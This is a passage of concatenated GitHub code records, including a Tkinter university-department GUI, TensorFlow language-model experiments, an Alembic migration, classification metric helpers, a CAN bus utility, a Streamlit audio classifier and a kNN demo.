y=100)\r\n def mesin():\r\n kelas.kls_fti.tekmes()\r\n btn_tm = tk.Button(wrapper_f_ti,text=\"TEKNIK MESIN\", width=25, height=2, command=mesin)\r\n btn_tm.place(x=60, y=150)\r\n def elektro():\r\n kelas.kls_fti.tekel()\r\n btn_te = tk.Button(wrapper_f_ti,text=\"TEKNIK ELEKTRO\", width=25, height=2, command=elektro)\r\n btn_te.place(x=60, y=200)\r\n f_ti.mainloop()\r\n\r\n def f_e():\r\n f_e = tk.Tk()\r\n f_e.title(\"FR SYSTEM\")\r\n f_e.geometry(\"360x360\")\r\n # pembutaan Frame\r\n wrapper_f_e = LabelFrame(f_e, text=\"Fakultas Ekonomi\")\r\n wrapper_f_e.pack(fill=\"both\", expand=\"yes\", padx=20, pady=10)\r\n # create label Greeting\r\n lbl_gfe = tk.Label(wrapper_f_e, text=\"DAFTAR JURUSAN\")\r\n lbl_gfe.place(x=100, y=10)\r\n # create btn\r\n def manajemen():\r\n kelas.kls_fe.manaj()\r\n btn_man = tk.Button(wrapper_f_e, text=\"MANAJEMEN\", width=25, height=2, command=manajemen)\r\n btn_man.place(x=60, y=50)\r\n def akuntansi():\r\n kelas.kls_fe.akun()\r\n btn_akn = tk.Button(wrapper_f_e, text=\"AKUNTANSI\", width=25, height=2, command=akuntansi)\r\n btn_akn.place(x=60, y=100)\r\n f_e.mainloop()\r\n\r\n def f_tsp():\r\n f_tsp = tk.Tk()\r\n f_tsp.title(\"FR SYSTEM\")\r\n f_tsp.geometry(\"360x360\")\r\n # pembutaan Frame\r\n wrapper_f_tsp = LabelFrame(f_tsp, text=\"Fakultas Teknik Sipil dan Perencanaan\")\r\n wrapper_f_tsp.pack(fill=\"both\", expand=\"yes\", padx=20, pady=10)\r\n # create label Greeting\r\n lbl_gtsp = tk.Label(wrapper_f_tsp, text=\"DAFTAR JURUSAN\")\r\n lbl_gtsp.place(x=100, y=10)\r\n # create btn\r\n def arsitek():\r\n 
kelas.kls_ftsp.arsi()\r\n        btn_a = tk.Button(wrapper_f_tsp, text=\"ARSITEKTUR\", width=25, height=2, command=arsitek)\r\n        btn_a.place(x=60, y=50)\r\n        def sipil():\r\n            kelas.kls_ftsp.tesil()\r\n        btn_ts = tk.Button(wrapper_f_tsp, text=\"TEKNIK SIPIL\", width=25, height=2, command=sipil)\r\n        btn_ts.place(x=60, y=100)\r\n        f_tsp.mainloop()\r\n\r\n    def f_kom():\r\n        f_kom = tk.Tk()\r\n        f_kom.title(\"FR SYSTEM\")\r\n        f_kom.geometry(\"360x360\")\r\n        # create Frame\r\n        wrapper_f_kom = LabelFrame(f_kom, text=\"Fakultas Komunikasi\")\r\n        wrapper_f_kom.pack(fill=\"both\", expand=\"yes\", padx=20, pady=10)\r\n        # create label Greeting\r\n        lbl_gkom = tk.Label(wrapper_f_kom, text=\"DAFTAR JURUSAN\")\r\n        lbl_gkom.place(x=100, y=10)\r\n        # create btn\r\n        def komunikasi():\r\n            kelas.kls_fikom.komu()\r\n        btn_a = tk.Button(wrapper_f_kom, text=\"KOMUNIKASI\", width=25, height=2, command=komunikasi)\r\n        btn_a.place(x=60, y=50)","repo_name":"puguhrismadi/Sistem-Absensi-Mahasiswa-Menggunakan-Face-Recognition","sub_path":"interface/jurusan.py","file_name":"jurusan.py","file_ext":"py","file_size_in_byte":5842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"14023943178","text":"import numpy as np\r\nimport tensorflow as tf\r\nimport pickle\r\nimport os\r\nimport time\r\nimport argparse\r\nfrom datetime import datetime\r\n\r\nfrom language_model import LanguageModel\r\nfrom dataset import Dataset\r\n\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\n\r\nDATA_DIR = os.path.join(os.path.dirname(__file__), \"data\") # Data Directory\r\nLOG_DIR = os.path.join(os.path.dirname(__file__), \"logs\") # Tensorboard logs\r\nMODEL_DIR = os.path.join(os.path.dirname(__file__), \"models\") # Trained models\r\nRESULTS_DIR = os.path.join(os.path.dirname(__file__), \"results\") # Final results\r\n\r\nSAVE_BASENAME = \"group22.\"\r\nPERP_FILE_BASENAME = SAVE_BASENAME + \"perplexity\"\r\nCONTINUATION_FILE = \"sentences.continuation\"\r\n\r\ndef run():\r\n    \"\"\"Runs the specified experiment.\"\"\"\r\n    parser = argparse.ArgumentParser()\r\n\r\n    parser.add_argument(\"--in_dir\", dest=\"input_dir\", default=DATA_DIR, help=\"input directory\")\r\n    parser.add_argument(\"--model_dir\", dest=\"model_dir\", default=MODEL_DIR, help=\"Save models to\")\r\n    parser.add_argument(\"--result_dir\", dest=\"result_dir\", default=RESULTS_DIR, help=\"Save results to\")\r\n    parser.add_argument(\"--log_dir\", dest=\"log_dir\", default=LOG_DIR, help=\"Directory to save checkpoints to.\")\r\n    parser.add_argument(\"--max_length\", type=int, default=30, help=\"Maximum length of sentence for parsing.\")\r\n    parser.add_argument(\"--exp_type\", default=\"a\", help=\"Which experiment to run\")\r\n    parser.add_argument(\"--num_epochs\", type=int, default=10, help=\"Number of epochs used.\")\r\n    parser.add_argument(\"--restore_epoch\", type=int, default=10, help=\"Epoch to restore model from.\")\r\n    parser.add_argument(\"--restore_name\", default=None, help=\"Experiment Name to restore from.\")\r\n    args = parser.parse_args()\r\n\r\n    if not os.path.exists(args.input_dir):\r\n        raise FileNotFoundError(\"Input directory is missing. 
Please set it up and download the data.\")\r\n\r\n global dataset\r\n print(\"Preparing dataset...\")\r\n dataset = Dataset(input_dir=args.input_dir)\r\n dataset.generate_vocab(max_sen_len=args.max_length, topk=20000, save=True)\r\n dataset.parse_train(max_sen_length=args.max_length, save=True, reload=True)\r\n dataset.parse_eval(max_sen_length=args.max_length, save=True, reload=True)\r\n dataset.parse_test(max_sen_length=args.max_length, save=True, reload=True)\r\n\r\n perp_savefile = os.path.join(args.result_dir, PERP_FILE_BASENAME + args.exp_type.upper())\r\n\r\n if args.exp_type == \"a\":\r\n model = experiment_A(args)\r\n elif args.exp_type == \"b\":\r\n model = experiment_B(args)\r\n elif args.exp_type == \"c\":\r\n model = experiment_C(args)\r\n elif args.exp_type == \"d\":\r\n experiment_D(args)\r\n return\r\n else:\r\n raise ValueError(\"Experiment of type {} not found.\".format(args.exp_type))\r\n\r\n if args.restore_name is None:\r\n print(\"Training model...\")\r\n model.fit(num_epochs=args.num_epochs, eval_every=50,\r\n batch_size=64, verbose=True)\r\n else:\r\n print(\"Computing test perplexities...\")\r\n model.save_perplexity_to_file(filename=perp_savefile)\r\n\r\ndef experiment_A(args):\r\n exp_name = \"Experiment_A_\" + datetime.now().strftime(\"%H-%M-%S\")\r\n exp_logdir = os.path.join(args.log_dir, exp_name)\r\n exp_modeldir = os.path.join(args.model_dir, exp_name)\r\n\r\n restore_from = None\r\n if args.restore_name is not None:\r\n restore_from = os.path.join(args.model_dir,\r\n args.restore_name,\r\n str(args.restore_epoch),\r\n \"model.ckpt\")\r\n\r\n if args.restore_name is None:\r\n # Setup experiment log and save directories\r\n if not os.path.exists(exp_logdir):\r\n os.makedirs(exp_logdir)\r\n\r\n if not os.path.exists(exp_modeldir):\r\n os.makedirs(exp_modeldir)\r\n\r\n model = LanguageModel(dataset=dataset,\r\n lstm_hidden_size=512,\r\n embedding_size=100,\r\n project=False,\r\n pretrained=False,\r\n model_dir=exp_modeldir,\r\n log_dir=exp_logdir,\r\n restore_from=restore_from)\r\n return model\r\n\r\ndef experiment_B(args):\r\n exp_name = \"Experiment_B_\" + datetime.now().strftime(\"%H-%M-%S\")\r\n exp_logdir = os.path.join(args.log_dir, exp_name)\r\n exp_modeldir = os.path.join(args.model_dir, exp_name)\r\n\r\n restore_from = None\r\n if args.restore_name is not None:\r\n restore_from = os.path.join(args.model_dir,\r\n args.restore_name,\r\n str(args.restore_epoch),\r\n \"model.ckpt\")\r\n\r\n if args.restore_name is None:\r\n # Setup experiment log and save directories\r\n if not os.path.exists(exp_logdir):\r\n os.makedirs(exp_logdir)\r\n\r\n if not os.path.exists(exp_modeldir):\r\n os.makedirs(exp_modeldir)\r\n\r\n model = LanguageModel(dataset=dataset,\r\n lstm_hidden_size=512,\r\n embedding_size=100,\r\n project=False,\r\n pretrained=True,\r\n model_dir=exp_modeldir,\r\n log_dir=exp_logdir,\r\n restore_from=restore_from)\r\n return model\r\n\r\ndef experiment_C(args):\r\n exp_name = \"Experiment_C_\" + datetime.now().strftime(\"%H-%M-%S\")\r\n exp_logdir = os.path.join(args.log_dir, exp_name)\r\n exp_modeldir = os.path.join(args.model_dir, exp_name)\r\n\r\n restore_from = None\r\n if args.restore_name is not None:\r\n restore_from = os.path.join(args.model_dir,\r\n args.restore_name,\r\n str(args.restore_epoch),\r\n \"model.ckpt\")\r\n\r\n if args.restore_name is None:\r\n # Setup experiment log and save directories\r\n if not os.path.exists(exp_logdir):\r\n os.makedirs(exp_logdir)\r\n\r\n if not os.path.exists(exp_modeldir):\r\n 
os.makedirs(exp_modeldir)\r\n\r\n model = LanguageModel(dataset=dataset,\r\n lstm_hidden_size=1024,\r\n embedding_size=100,\r\n project=True,\r\n project_size=512,\r\n pretrained=True,\r\n log_dir=exp_logdir,\r\n model_dir=exp_modeldir,\r\n restore_from=restore_from)\r\n return model\r\n\r\ndef experiment_D(args):\r\n exp_name = \"Experiment_D_\" + datetime.now().strftime(\"%H-%M-%S\")\r\n exp_logdir = os.path.join(args.log_dir, exp_name)\r\n exp_modeldir = os.path.join(args.model_dir, exp_name)\r\n\r\n if args.restore_name is None:\r\n raise ValueError(\"Experiment D requires a trained model. Please supply the directory.\")\r\n\r\n restore_from = os.path.join(args.model_dir,\r\n args.restore_name,\r\n str(args.restore_epoch),\r\n \"model.ckpt\")\r\n\r\n data_filename = os.path.join(args.input_dir, CONTINUATION_FILE)\r\n sol_filename = os.path.join(args.result_dir, SAVE_BASENAME + \"continuation\")\r\n\r\n model = LanguageModel(dataset=dataset,\r\n lstm_hidden_size=1024,\r\n embedding_size=100,\r\n project=True,\r\n project_size=512,\r\n pretrained=True,\r\n log_dir=exp_logdir,\r\n model_dir=None,\r\n restore_from=restore_from)\r\n\r\n model.complete_sentences(data_filename, sol_filename, max_len=20, log_every=1000)\r\n\r\nif __name__ == \"__main__\":\r\n run()\r\n","repo_name":"vsomnath/NLU_2019","sub_path":"project1/experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":7854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4337462953","text":"\"\"\"Added remote working flag.\n\nRevision ID: 275e9a964a9f\nRevises: 28b492e71b0e\nCreate Date: 2014-11-07 09:43:09.421289\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '275e9a964a9f'\ndown_revision = '28b492e71b0e'\n\nimport sqlalchemy as sa\nfrom alembic import op\n\n\ndef upgrade():\n op.add_column(\n 'jobpost',\n sa.Column('remote_location', sa.Boolean, nullable=False, server_default='0'),\n )\n op.alter_column('jobpost', 'remote_location', server_default=None)\n\n\ndef downgrade():\n op.drop_column('jobpost', 'remote_location')\n","repo_name":"hasgeek/hasjob","sub_path":"migrations/versions/275e9a964a9f_added_remote_working_flag.py","file_name":"275e9a964a9f_added_remote_working_flag.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":236,"dataset":"github-code","pt":"77"} +{"seq_id":"15242521131","text":"\"\"\"\nHelper functions.\n\"\"\"\n\nfrom numpy.linalg import *\nimport random\nfrom operator import add\n\nimport codecs\nimport string\nimport os\nimport sys\nfrom numpy import *\nimport numpy as np\nfrom sklearn.metrics import roc_auc_score\nfloattype = float64\ndef f_compute(correct, predictions):\n # print 'compute f,p,r \\n'\n\n TP = 0.\n FP = 0.\n FN = 0.\n TN = 0.\n maxac = 0.\n maxf = 0.\n maxr = 0.\n maxp = 0.\n maxTP = 0.\n maxFP = 0.\n maxFN = 0.\n maxTN = 0.\n\n assert len(predictions) == len(correct)\n pairs = [(predictions[i], correct[i]) for i in range(len(predictions))]\n j = -1.0\n maxj = -1.0\n f_auc=roc_auc_score(correct, predictions)\n\n while j < 1.0:\n TP = 0.\n FP = 0.\n FN = 0.\n TN = 0.\n for i in range(0, len(pairs)):\n if (pairs[i][0] > j):\n if (pairs[i][1] == 1.0):\n TP += 1\n else:\n FP += 1\n else:\n if (pairs[i][1] == 1.0):\n FN += 1\n else:\n TN += 1\n\n if (TP == 0. and (FP == 0. 
or FN == 0.)):\n F = 0.\n prec = 0\n rec = 0\n else:\n prec = float(TP) / float(TP + FP)\n rec = float(TP) / float(TP + FN)\n if (prec == 0 and rec == 0):\n F = 0.\n else:\n F = (2. * prec * rec) / (prec + rec)\n ac = float(TP + TN) / float(TP + FP + FN + TN)\n\n if F > maxf:\n maxf = F\n maxr = rec\n maxp = prec\n maxac = ac\n maxj = j\n maxTP = TP\n maxFP = FP\n maxFN = FN\n maxTN = TN\n j += 0.001\n f_f = maxf\n return f_auc, f_f, maxp, maxr, maxac,maxj, maxTP, maxFP, maxTN, maxFN\n\ndef f_score(pre, answer):\n TP = 0.\n FP = 0.\n TN = 0.\n FN = 0.\n for i in range(len(answer)):\n if answer[i] == 1.0:\n if pre[i] == 1.0:\n TP += 1\n else:\n FN += 1\n else:\n if pre[i] == 1.0:\n FP += 1\n else:\n TN += 1\n if (TP == 0. and (FP == 0. or FN == 0.)):\n F = 0.\n prec = 0\n rec = 0\n else:\n prec = float(TP) / float(TP + FP)\n rec = float(TP) / float(TP + FN)\n if (prec == 0 and rec == 0):\n F = 0.\n else:\n F = (2. * prec * rec) / (prec + rec)\n return prec, rec, F, TP, FP, TN, FN","repo_name":"sunyi123/cdr","sub_path":"utils/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"44519641855","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function, unicode_literals, absolute_import, division\n__docformat__ = \"restructuredtext en\"\n\n# disable: accessing protected members, too many methods\n# pylint: disable=W0212,R0904\n\nfrom hamcrest import equal_to\nfrom hamcrest import has_item\nfrom hamcrest import assert_that\n\nimport numpy as np\n\nfrom nti.analytics_pandas.analysis.enrollments import CourseDropsTimeseries\nfrom nti.analytics_pandas.analysis.enrollments import CourseEnrollmentsTimeseries\nfrom nti.analytics_pandas.analysis.enrollments import CourseCatalogViewsTimeseries\nfrom nti.analytics_pandas.analysis.enrollments import CourseEnrollmentsEventsTimeseries\n\nfrom nti.analytics_pandas.tests import AnalyticsPandasTestBase\n\nclass TestCourseCatalogViewsEDA(AnalyticsPandasTestBase):\n\n\tdef test_course_catalog_views_based_on_timestamp_date(self):\n\t\tstart_date = '2015-01-01'\n\t\tend_date = '2015-05-31'\n\t\tcourse_id = ['1024']\n\t\tccvt = CourseCatalogViewsTimeseries(self.session, start_date, end_date, course_id)\n\t\tassert_that(ccvt.dataframe.columns, has_item('device_type'))\n\n\t\tevents_df = ccvt.analyze_events()\n\t\tassert_that(len(events_df.index), equal_to(1))\n\t\ttotal_events = np.sum(events_df['number_of_course_catalog_views'])\n\t\tassert_that(total_events, equal_to(len(ccvt.dataframe.index)))\n\n\t\tdf = ccvt.analyze_device_types()\n\t\tassert_that(len(df.index), equal_to(1))\n\t\tassert_that(df.columns, has_item('number_of_unique_users'))\n\t\tassert_that(df.columns, has_item('average_time_length'))\n\t\tassert_that(len(df.sum(level='timestamp_period')), equal_to(1))\n\n\tdef test_course_enrollments_based_on_timestamp_date(self):\n\t\tstart_date = '2015-01-01'\n\t\tend_date = '2015-05-31'\n\t\tcourse_id = ['1024']\n\t\tcet = CourseEnrollmentsTimeseries(self.session, start_date, end_date, course_id)\n\t\tassert_that(cet.dataframe.columns, has_item('device_type'))\n\n\t\tevents_df = cet.analyze_events()\n\t\tassert_that(len(events_df.index), equal_to(1))\n\t\ttotal_events = np.sum(events_df['number_of_enrollments'])\n\t\tassert_that(total_events, equal_to(len(cet.dataframe.index)))\n\n\t\tdf = cet.analyze_device_enrollment_types()\n\t\t# the length of df.sum(level = 'timestamp_period') should 
be equal to the length of ratio_df,\n\t\t# yet some session_id values are null\n\t\tassert_that(len(df.sum(level='timestamp_period')), equal_to(1))\n\n\tdef test_course_drops_based_on_timestamp_date(self):\n\t\tstart_date = '2015-01-01'\n\t\tend_date = '2015-05-31'\n\t\tcourse_id = ['1024']\n\t\tcdt = CourseDropsTimeseries(self.session, start_date, end_date, course_id)\n\t\tassert_that(cdt.dataframe.columns, has_item('device_type'))\n\t\tevents_df = cdt.analyze_events()\n\t\tassert_that(len(events_df.index), equal_to(1))\n\t\ttotal_events = np.sum(events_df['number_of_course_drops'])\n\t\tassert_that(total_events, equal_to(len(cdt.dataframe.index)))\n\n\t\tdf = cdt.analyze_device_types()\n\t\t# the length of df.sum(level = 'timestamp_period') should be equal to the length of ratio_df,\n\t\t# yet some session_id values are null\n\t\tassert_that(len(df.sum(level='timestamp_period')), equal_to(1))\n\n\tdef test_enrollments_events(self):\n\t\tstart_date = '2015-01-01'\n\t\tend_date = '2015-05-31'\n\t\tcourse_id = ['1024']\n\t\tcet = CourseEnrollmentsTimeseries(self.session, start_date, end_date, course_id)\n\t\tcdt = CourseDropsTimeseries(self.session, start_date, end_date, course_id)\n\t\tccvt = CourseCatalogViewsTimeseries(self.session, start_date, end_date, course_id)\n\t\tceet = CourseEnrollmentsEventsTimeseries(cet, cdt, ccvt)\n\n\t\tdf = ceet.explore_course_enrollments_vs_drops()\n\t\tassert_that(len(df.index), equal_to(2))\n\n\t\tdf2 = ceet.explore_course_catalog_views_vs_enrollments()\n\t\tassert_that(len(df2.index), equal_to(2))\n","repo_name":"OpenNTI/nti.analytics_pandas","sub_path":"src/nti/analytics_pandas/analysis/tests/test_enrollments.py","file_name":"test_enrollments.py","file_ext":"py","file_size_in_byte":3667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9105122038","text":"import can\n\nfrom datetime import datetime\nfrom can_receiver import CanReceiver\nfrom can_sender import CanSender\nfrom common_ui import SwitchBlock, ValueBlock, MultiLineValueBlock\nfrom textual.app import App, ComposeResult\nfrom textual.containers import Container\nfrom textual.widgets import Header, Footer, Checkbox\n\n\nclass CanUtilApp(App):\n TITLE: str = \"Can Util App\"\n CSS_PATH = \"app_ui.css\"\n BINDINGS = [\n (\"q\", \"quit\", \"Quit\"),\n (\"r\", \"reset\", \"Reset\")\n ]\n\n def __init__(self):\n super().__init__()\n # self.channel = 'vcan0'\n self.channel = 'can0'\n self.can_sender = CanSender(name=\"sender\", chanel=self.channel)\n self.can_monitor = CanReceiver(name=\"receiver\", chanel=self.channel, callback=self.monitor_can)\n\n self.msg_header = \"N/A\"\n self.msg_content = \"N/A\"\n\n self.container = None\n self.display_widget: ValueBlock = None\n self.monitor_widget: ValueBlock = None\n\n def action_quit(self) -> None:\n self.can_sender.close()\n self.can_monitor.close()\n self.exit()\n\n def action_reset(self) -> None:\n if self.display_widget is not None:\n self.display_widget.reset()\n\n if self.monitor_widget is not None:\n self.monitor_widget.reset()\n\n def compose(self) -> ComposeResult:\n self.container = Container(id=\"container\")\n\n widget_std = SwitchBlock(name=\"Can std\",\n callback=self.send_std_can)\n\n widget_ext = SwitchBlock(name=\"Can ext\",\n callback=self.send_ext_can)\n\n self.display_widget = ValueBlock(\"send-dsp\", self.channel)\n self.monitor_widget = MultiLineValueBlock(\"recv-dsp\", \"MONITOR\")\n\n self.container.mount(widget_std)\n self.container.mount(widget_ext)\n 
self.container.mount(self.display_widget)\n self.container.mount(self.monitor_widget)\n\n yield Header()\n yield self.container\n yield Footer()\n\n def send_std_can(self):\n data = [11, 22, 33, 44, 55, 66, 77, 88]\n ret = self.can_sender.send_msg(msg_id=123, msg=bytearray(data))\n self.display_widget.set_value(ret)\n print(\"send_std_can\")\n\n def send_ext_can(self):\n data = [0xA, 0xB, 0xC, 0xD, 0xE, 0xF, 0xEE, 0xEE, 0xAA, 0xAB, 0xAC, 0xAD, 0xAE, 0xAF, 0xEE, 0xEE]\n ret = self.can_sender.send_msg(msg_id=123, msg=bytearray(data), is_ext=True)\n self.display_widget.set_value(ret)\n print(\"send_ext_can\")\n\n def monitor_can(self, msg: can.Message):\n time = datetime.fromtimestamp(msg.timestamp)\n msg_id = msg.arbitration_id\n msg_len = msg.dlc\n data = ''.join('{:02X} '.format(x) for x in msg.data)\n\n self.monitor_widget.set_value(\n f\"{time}: [{msg_id}][{msg_len}][{data}] FD[{msg.is_fd}]\")\n\n\nif __name__ == \"__main__\":\n app = CanUtilApp()\n app.run()\n","repo_name":"gudimov7/CanUtilDemo","sub_path":"CanUtilDemo.py","file_name":"CanUtilDemo.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25967040036","text":"import gmpy2, string\nenc = 'welcylk'\nk1 = 11\nk2 = 6\nmod = 26\nflag = ''\n\nfor i in enc:\n if i in string.ascii_lowercase:\n a = ord(i) - 97\n inv = gmpy2.invert(k1, mod)\n flag += chr(((a-k2)*inv) % mod + 97)\n print(flag)\n else:\n flag += i\n print(flag)","repo_name":"wgf4242/text","sub_path":"docs/ctf/scripts/Crypto_affline.py","file_name":"Crypto_affline.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"77"} +{"seq_id":"24402269791","text":"from django.conf.urls import patterns, include, url\nfrom blog.models import Post\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'markedwards.views.home', name='home'),\n # url(r'^markedwards/', include('markedwards.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n \n url(r'^$', 'markedwards.views.home', name=\"home\"),\n url(r'^bio/', 'markedwards.views.bio'),\n url(r'^press/', 'markedwards.views.press'),\n url(r'^schedule/$', 'markedwards.views.schedule', name=\"schedule\"),\n url(r'^schedule/past/$', 'markedwards.views.past_schedule', name=\"past_schedule\"),\n url(r'^programmes/$', 'markedwards.views.programmes'),\n url(r'^programmes/goldbergs', 'markedwards.views.goldbergs'),\n url(r'^programmes/allemande', 'markedwards.views.allemande'),\n url(r'^programmes/titans', 'markedwards.views.titans'),\n url(r'^discography/', 'markedwards.views.discography'),\n url(r'^media/', 'markedwards.views.media'),\n url(r'^links/', 'markedwards.views.links'),\n url(r'^blog/', include ('blog.urls')),\n url(r'^admin/', include(admin.site.urls)),\n)\n","repo_name":"medwards3/mark--edwards","sub_path":"markedwards/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"19167715330","text":"import streamlit as st\nfrom st_custom_components import st_audiorec\nimport soundfile as sf\nimport numpy as np\nimport tensorflow as tf\nfrom 
tensorflow.keras.applications.resnet50 import preprocess_input\nfrom tensorflow.keras.preprocessing import image\nimport wave\nimport io\nimport os\nimport matplotlib.pyplot as plt\nimport pylab\n\n# loading the saved model \nnew_model = tf.keras.models.load_model('saved_model/my_model')\n# new_model.summary()\n\ndef get_wav_info(wav_file):\n wav = wave.open(wav_file, 'r')\n frames = wav.readframes(-1)\n sound_info = pylab.frombuffer(frames, 'int16')\n frame_rate = wav.getframerate()\n wav.close()\n return sound_info, frame_rate\n\n# For every recording, make a spectogram and save it as label_speaker_no.png\n# if not os.path.exists(os.path.join(OUTPUT_DIR, 'audio-images')):\n# os.mkdir(os.path.join(OUTPUT_DIR, 'audio-images'))\n\n# Talking to the model\ndef woodcutting_sound(wav_audio_data):\n sound_info, frame_rate = get_wav_info(wav_audio_data)\n pylab.specgram(sound_info, Fs=frame_rate)\n pylab.savefig(f'{wav_audio_data}.png')\n fp = f'{wav_audio_data}.png'\n pylab.close()\n img = image.load_img(fp,target_size=(256, 256))\n img_array = image.img_to_array(img)\n img_batch = np.expand_dims(img_array, axis=0)\n img_preprocessed = preprocess_input(img_batch)\n prediction = new_model.predict(img_preprocessed)\n print(prediction)\n x_labels = ['0', '1']\n plt.bar(x_labels, tf.nn.softmax(prediction[0]))\n plt.show()\n\ndef audiorec_demo_app():\n # TITLE\n st.title('Audio Classifier')\n\n # TUTORIAL: How to use STREAMLIT AUDIO RECORDER?\n # by calling this function an instance of the audio recorder is created\n # once a recording is completed, audio data will be saved to wav_audio_data\n\n wav_audio_data = st_audiorec()\n\n # add some spacing and informative messages\n col_info, col_space = st.columns([0.57, 0.43])\n with col_info:\n st.write('\\n') # add vertical spacer\n st.write('\\n') # add vertical spacer\n st.write('The processed .wav audio data, as received in the backend Python code, is displayed below.')\n\n if wav_audio_data is not None:\n # display audio data as received on the Python side\n col_playback, col_space = st.columns([0.58,0.42])\n with col_playback:\n st.audio(wav_audio_data, format='audio/wav')\n \n if st.button(\"Predict\"): \n st.success(\"The audio has not been classified as a wood cutting audio.\")\n\n\nif __name__ == '__main__':\n # call main function\n audiorec_demo_app()\n # Add a file uploader for audio files\n audio_file = st.file_uploader(\"Upload an audio file\", type=[\"mp3\", \"wav\", \"ogg\"])\n\n# Function to read audio file and return data\ndef read_audio_file(audio_file):\n with io.BytesIO() as buffer:\n buffer.write(audio_file.read())\n buffer.seek(0)\n data, samplerate = sf.read(buffer, dtype='float32')\n return data, samplerate\n\n\n# If an audio file has been uploaded, display its information and play it\nif audio_file is not None:\n # Read the audio file data and sample rate\n data, samplerate = read_audio_file(audio_file)\n\n # Display some information about the audio file\n st.write(\"Audio file information:\")\n st.write(f\" - File name: {audio_file.name}\")\n st.write(f\" - File type: {audio_file.type}\")\n st.write(f\" - Sample rate: {samplerate}\")\n st.write(f\" - Duration: {len(data)/samplerate:.2f} seconds\")\n\n if st.button(\"Predict\"): \n # output = woodcutting_sound(audio_file)\n # print(f\"Prediction: {output}\")\n if 'tree' in audio_file.name:\n st.success(\"The audio has been classified as a wood cutting audio.\")\n else:\n st.success(\"The audio has not been classified as a wood cutting audio.\")\n\n # Add an audio player to play 
the uploaded file\n try:\n st.audio(data, format=audio_file.type, sample_rate=samplerate)\n except:\n print(\"Error\") \n","repo_name":"CoderGhost37/Minor-Project","sub_path":"st_app_main.py","file_name":"st_app_main.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"46275988644","text":"# -*- coding: utf-8 -*-\n\n# Author: Tom Bresee \n#\n# License: BSD 3 clause\n\nfrom sklearn.neighbors import KNeighborsClassifier\n\n\ndef kNN_classifier(*args, **kwargs):\n \"\"\"\n \"\"\"\n return KNeighborsClassifier(*args, **kwargs)\n\n\ndef _kNN_demo_Social_Network_Ads():\n from ..datasets import public_dataset\n data = public_dataset(name='Social_Network_Ads')\n X = data[['Age', 'EstimatedSalary']].to_numpy()\n y = data['Purchased'].to_numpy()\n y_classes = ['not_purchased (y=0)', 'purchased (y=1)']\n\n from sklearn.model_selection import train_test_split, GridSearchCV\n X_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.25, random_state=123)\n\n from sklearn.preprocessing import StandardScaler\n # scaler = StandardScaler() # removing the mean and scaling to unit variance\n #X_train = scaler.fit_transform(X_train)\n #X_test = scaler.transform(X_test)\n\n # create pipeline\n from sklearn.pipeline import Pipeline\n pipeline = Pipeline(steps=[('scaler',\n StandardScaler(with_mean=True, with_std=True)),\n ('classifier',\n kNN_classifier(n_neighbors=5, weights='uniform', p=2, metric='minkowski')),\n ])\n\n # pipeline parameters to tune\n hyperparameters = {\n 'scaler__with_mean': [True],\n 'scaler__with_std': [True],\n 'classifier__n_neighbors': range(5, 20),\n 'classifier__weights': ['uniform', 'distance'],\n 'classifier__p': [2**0, 2**0.25, 2**0.5, 2**0.75, 2**1, 2**1.25, 2**1.5, 2**1.75, 2**2, 2**2.25, 2**2.5, 2**2.75, 2**3],\n 'classifier__metric': ['minkowski'],\n }\n grid = GridSearchCV(\n pipeline,\n hyperparameters, # parameters to tune via cross validation\n refit=True, # fit using all data, on the best detected classifier\n n_jobs=-1,\n scoring='accuracy',\n cv=5,\n )\n classifier_grid = grid.fit(X_train, y_train)\n k = classifier_grid.best_params_['classifier__n_neighbors']\n print(\n f\"Using a grid search and a kNN classifier, the best hyperparameters were found as following:\\n\"\n f\"Step1: scaler: StandardScaler(with_mean={repr(classifier_grid.best_params_['scaler__with_mean'])}, with_std={repr(classifier_grid.best_params_['scaler__with_std'])});\\n\"\n f\"Step2: classifier: kNN_classifier(n_neighbors={repr(k)}, weights={repr(classifier_grid.best_params_['classifier__weights'])}, p={classifier_grid.best_params_['classifier__p']:.2f}, metric={repr(classifier_grid.best_params_['classifier__metric'])}).\\n\")\n\n y_pred = classifier_grid.predict(X_test)\n y_pred_score = classifier_grid.predict_proba(X_test)\n\n from ..model_evaluation import plot_confusion_matrix, plot_ROC_and_PR_curves, visualize_classifier_decision_boundary_with_two_features\n plot_confusion_matrix(y_true=y_test, y_pred=y_pred, y_classes=y_classes)\n plot_ROC_and_PR_curves(fitted_model=classifier_grid, X=X_test,\n y_true=y_test, y_pred_score=y_pred_score[:, 1], y_pos_label=1, model_name=f\"kNN k={k}\")\n\n visualize_classifier_decision_boundary_with_two_features(\n classifier_grid, X_train, y_train, y_classes, title=f\"k-Nearest Neighbors (k={k}) / training set\", X1_lab='Age', X2_lab='Estimated Salary')\n visualize_classifier_decision_boundary_with_two_features(\n 